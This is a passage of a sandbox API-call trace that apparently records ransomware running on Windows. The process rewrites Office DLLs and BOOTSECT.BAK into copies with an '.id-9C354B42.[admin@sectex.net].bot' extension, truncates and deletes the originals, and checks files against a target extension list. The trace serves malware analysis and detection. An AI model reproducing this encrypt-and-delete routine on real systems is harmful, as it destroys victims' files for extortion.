	[0058.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.141] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.141] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0058.142] GetLastError () returned 0x0
	[0058.142] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x6bfa0, lpOverlapped=0x0) returned 1
	[0058.150] WriteFile (in: hFile=0x1c0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x6bfb0, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x6bfb0, lpOverlapped=0x0) returned 1
	[0058.158] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.158] WriteFile (in: hFile=0x1c0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0058.158] SetEndOfFile (hFile=0x1c0) returned 1
	[0058.158] CloseHandle (hObject=0x1c0) returned 1
	[0058.158] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.158] SetEndOfFile (hFile=0x230) returned 1
	[0058.162] CloseHandle (hObject=0x230) returned 1
	[0058.162] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.162] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 1
	[0058.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.162] lstrlenW (lpString=".doc") returned 4
	[0058.162] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.162] lstrlenW (lpString=".docx") returned 5
	[0058.162] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1
	[0058.162] lstrlenW (lpString=".pdf") returned 4
	[0058.162] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.162] lstrlenW (lpString=".xls") returned 4
	[0058.162] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.162] lstrlenW (lpString=".xlsx") returned 5
	[0058.162] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1
	[0058.162] lstrlenW (lpString=".ppt") returned 4
	[0058.162] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.162] lstrlenW (lpString=".zip") returned 4
	[0058.163] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString=".rar") returned 4
	[0058.163] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString=".bz2") returned 4
	[0058.163] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.163] lstrlenW (lpString=".7z") returned 3
	[0058.163] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.163] lstrlenW (lpString=".dbf") returned 4
	[0058.163] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.163] lstrlenW (lpString=".1cd") returned 4
	[0058.163] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.163] lstrlenW (lpString=".jpg") returned 4
	[0058.163] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.163] lstrlenW (lpString=".doc") returned 4
	[0058.163] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString=".docx") returned 5
	[0058.163] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1
	[0058.163] lstrlenW (lpString=".pdf") returned 4
	[0058.163] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString=".xls") returned 4
	[0058.163] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString=".xlsx") returned 5
	[0058.163] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1
	[0058.163] lstrlenW (lpString=".ppt") returned 4
	[0058.163] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.163] lstrlenW (lpString=".zip") returned 4
	[0058.163] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString=".rar") returned 4
	[0058.163] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.163] lstrlenW (lpString=".bz2") returned 4
	[0058.163] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.163] lstrlenW (lpString=".7z") returned 3
	[0058.163] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.164] lstrlenW (lpString=".dbf") returned 4
	[0058.164] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.164] lstrlenW (lpString=".1cd") returned 4
	[0058.164] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67
	[0058.164] lstrlenW (lpString=".jpg") returned 4
	[0058.164] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.164] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.164] lstrlenW (lpString="ACEEXCL.DLL") returned 11
	[0058.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.164] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=899992) returned 1
	[0058.164] CloseHandle (hObject=0x230) returned 1
	[0058.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll")) returned 0x20
	[0058.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.165] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.165] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0058.165] GetLastError () returned 0x0
	[0058.165] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xdbb98, lpOverlapped=0x0) returned 1
	[0058.389] WriteFile (in: hFile=0x1c0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xdbba0, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xdbba0, lpOverlapped=0x0) returned 1
	[0058.405] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.405] WriteFile (in: hFile=0x1c0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0058.405] SetEndOfFile (hFile=0x1c0) returned 1
	[0058.405] CloseHandle (hObject=0x1c0) returned 1
	[0058.405] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.405] SetEndOfFile (hFile=0x230) returned 1
	[0058.412] CloseHandle (hObject=0x230) returned 1
	[0058.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.521] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll")) returned 1
	[0058.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.841] lstrlenW (lpString=".doc") returned 4
	[0058.841] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.841] lstrlenW (lpString=".docx") returned 5
	[0058.841] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0058.841] lstrlenW (lpString=".pdf") returned 4
	[0058.841] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.841] lstrlenW (lpString=".xls") returned 4
	[0058.841] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.841] lstrlenW (lpString=".xlsx") returned 5
	[0058.841] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0058.842] lstrlenW (lpString=".ppt") returned 4
	[0058.842] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.842] lstrlenW (lpString=".zip") returned 4
	[0058.842] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString=".rar") returned 4
	[0058.842] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString=".bz2") returned 4
	[0058.842] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.842] lstrlenW (lpString=".7z") returned 3
	[0058.842] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.842] lstrlenW (lpString=".dbf") returned 4
	[0058.842] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.842] lstrlenW (lpString=".1cd") returned 4
	[0058.842] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.842] lstrlenW (lpString=".jpg") returned 4
	[0058.842] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.842] lstrlenW (lpString=".doc") returned 4
	[0058.842] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString=".docx") returned 5
	[0058.842] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0058.842] lstrlenW (lpString=".pdf") returned 4
	[0058.842] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString=".xls") returned 4
	[0058.842] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString=".xlsx") returned 5
	[0058.842] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0058.842] lstrlenW (lpString=".ppt") returned 4
	[0058.842] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.843] lstrlenW (lpString=".zip") returned 4
	[0058.843] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.843] lstrlenW (lpString=".rar") returned 4
	[0058.843] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.843] lstrlenW (lpString=".bz2") returned 4
	[0058.843] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.843] lstrlenW (lpString=".7z") returned 3
	[0058.843] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.843] lstrlenW (lpString=".dbf") returned 4
	[0058.843] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.843] lstrlenW (lpString=".1cd") returned 4
	[0058.843] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67
	[0058.843] lstrlenW (lpString=".jpg") returned 4
	[0058.843] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.843] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.843] lstrlenW (lpString="ACEWSS.DLL") returned 10
	[0058.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 12
	os_tid = 0x984

	[0032.813] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xab90268
	[0032.814] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xaba0270
	[0032.814] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08ec8
	[0032.814] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0xabb0290
	[0032.814] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08ee0
	[0032.814] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xad80020
	[0032.814] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08ef8
	[0032.814] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08ef8, Size=0x20) returned 0x7df2f68
	[0032.814] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08ef8
	[0032.815] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08ef8, Size=0x20) returned 0x7df2f90
	[0032.815] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.815] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.815] Wow64DisableWow64FsRedirection (in: OldValue=0xa19ff58 | out: OldValue=0xa19ff58*=0x0) returned 1
	[0032.815] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.815] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.815] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.815] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.815] Sleep (dwMilliseconds=0x64) 
	[0033.037] lstrcmpiW (lpString1=".LOG", lpString2=".bot") returned 1
	[0033.037] lstrlenW (lpString="BCD.LOG") returned 7
	[0033.037] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0033.230] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.230] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.230] lstrlenW (lpString=".doc") returned 4
	[0033.230] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1
	[0033.230] lstrlenW (lpString=".docx") returned 5
	[0033.230] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1
	[0033.230] lstrlenW (lpString=".pdf") returned 4
	[0033.230] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1
	[0033.230] lstrlenW (lpString=".xls") returned 4
	[0033.230] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1
	[0033.230] lstrlenW (lpString=".xlsx") returned 5
	[0033.230] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1
	[0033.230] lstrlenW (lpString=".ppt") returned 4
	[0033.230] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1
	[0033.230] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.230] lstrlenW (lpString=".zip") returned 4
	[0033.230] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1
	[0033.230] lstrlenW (lpString=".rar") returned 4
	[0033.230] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1
	[0033.231] lstrlenW (lpString=".bz2") returned 4
	[0033.231] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1
	[0033.231] lstrlenW (lpString=".7z") returned 3
	[0033.231] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1
	[0033.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.231] lstrlenW (lpString=".dbf") returned 4
	[0033.231] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1
	[0033.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.231] lstrlenW (lpString=".1cd") returned 4
	[0033.231] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1
	[0033.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.231] lstrlenW (lpString=".jpg") returned 4
	[0033.231] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1
	[0033.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.231] lstrlenW (lpString=".doc") returned 4
	[0033.231] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1
	[0033.231] lstrlenW (lpString=".docx") returned 5
	[0033.231] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1
	[0033.231] lstrlenW (lpString=".pdf") returned 4
	[0033.231] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1
	[0033.231] lstrlenW (lpString=".xls") returned 4
	[0033.231] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1
	[0033.231] lstrlenW (lpString=".xlsx") returned 5
	[0033.231] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1
	[0033.231] lstrlenW (lpString=".ppt") returned 4
	[0033.231] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1
	[0033.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.231] lstrlenW (lpString=".zip") returned 4
	[0033.231] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1
	[0033.231] lstrlenW (lpString=".rar") returned 4
	[0033.231] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1
	[0033.231] lstrlenW (lpString=".bz2") returned 4
	[0033.231] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1
	[0033.232] lstrlenW (lpString=".7z") returned 3
	[0033.232] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1
	[0033.232] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.232] lstrlenW (lpString=".dbf") returned 4
	[0033.232] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1
	[0033.232] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.232] lstrlenW (lpString=".1cd") returned 4
	[0033.232] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1
	[0033.232] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0033.232] lstrlenW (lpString=".jpg") returned 4
	[0033.232] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1
	[0033.232] lstrcmpiW (lpString1=".BAK", lpString2=".bot") returned -1
	[0033.232] lstrlenW (lpString="BOOTSECT.BAK") returned 12
	[0033.232] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.234] GetFileSizeEx (in: hFile=0x180, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=8192) returned 1
	[0033.234] CloseHandle (hObject=0x180) returned 1
	[0033.234] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27
	[0033.234] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\bootsect.bak.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.234] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1
	[0033.234] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.234] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.234] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.235] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\bootsect.bak.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0033.235] GetLastError () returned 0x0
	[0033.235] ReadFile (in: hFile=0x180, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x2000, lpOverlapped=0x0) returned 1
	[0033.339] WriteFile (in: hFile=0x184, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x2010, lpOverlapped=0x0) returned 1
	[0033.340] ReadFile (in: hFile=0x180, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.340] WriteFile (in: hFile=0x184, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0033.341] SetEndOfFile (hFile=0x184) returned 1
	[0033.341] CloseHandle (hObject=0x184) returned 1
	[0033.342] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.342] SetEndOfFile (hFile=0x180) returned 1
	[0033.343] CloseHandle (hObject=0x180) returned 1
	[0033.343] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x27) returned 1
